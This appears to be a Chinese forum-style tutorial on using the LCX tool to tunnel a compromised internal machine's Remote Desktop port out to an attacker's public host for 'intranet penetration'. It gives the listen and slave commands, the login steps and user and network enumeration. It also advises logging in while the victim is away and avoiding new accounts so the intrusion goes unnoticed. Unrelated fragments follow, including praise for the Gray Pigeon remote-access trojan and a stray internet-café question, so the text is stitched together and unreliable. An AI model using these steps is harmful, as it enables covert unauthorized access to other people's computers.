使用LCX工具吧。
lcx一共有三条命令,第一条命令(lcx –lister 51 3389)是在具有外网独立IP的计算机上执行,表示在本机上监听51端口,该端口主要是接受被控制计算机3389端口转发过来的数据。第二条命令(lcx –slave 218.69.*.* 51 192.168.80.129 3389)表示将本机IP地址为192.168.80.129的3389端口转发到远程地址为“218.69.*.*”的51端口。第三条命令是端口转向。
3在本机上执行监听命令
在本机上打开DOS命令提示符,然后到lcx.exe程序所在路径执行“lcx –lister 51 3389”命令,监听51端口,监听成功后,会显示如图3所示的数据。
图3 在本机上监听51端口
注意
(1)在本机上监听的端口必须是未使用的端口,可以使用“netstat -an |find "51" ”命令进行查看,如果没有显示结果则表示51端口可以用来进行监听。
(2)被控制计算机与本机成功建立连接后会不停的显示连接数据,如图4所示,如果未出现数据发送和接受的情况,说明连接建立不成功。
图4 成功建立连接
4在本机使用远程终端进行登录
在DOS提示符下输入“mstsc”命令打开远程终端连接器,输入“127.0.0.1”后单击“连接”按钮进行远程终端连接,在出现登录界面后分别收入用户名和密码,验证通过后,即可远程进入被控制计算机的桌面,如图5所示,输入“ipconfig /all”以及“net user”命令来查看网络配置情况以及用户信息。
图5远程登入被控制计算机
注意
(1)如果被控制计算机是服务器,则在登陆时可以直接进行登陆;如果被控制计算机是Windows XP系统,则最好选择用户不在计算机的时间进行登陆,否则容易被发现。
(2)不要轻易在被控制计算机上建立账号,尤其是Windows XP,建立帐号后,会立即在登陆界面中进行显示。
5查看本地连接
在被控制计算机上使用“netstat -an”查看当前所有的连接时,可以看到被控制计算机时在跟自己进行远程终端连接,如图6所示,而实际的3389端口是跟本机的51端口进行连接的。
图6 查看实际网络连接
本案例通过使用lcx端口转发程序,成功的在本机连入被控制计算机的内网,可以很方便的对该计算机进行远程管理,在进行内网渗透时尤为有用。
服务器 lcx -slave 125.34.9.7 1985 192.168.37.6 3389
电脑都自动获取ip。路由器一般4个lan口,lan口可以接交换机,不用手动分配ip,在一个同网段的路由器下就是局域网
灰鸽子 全部搞定!
我在网吧玩面对面游戏,我可以看到我自己的视频,也可看到其他用户,但其他用户也无法看到自己的视频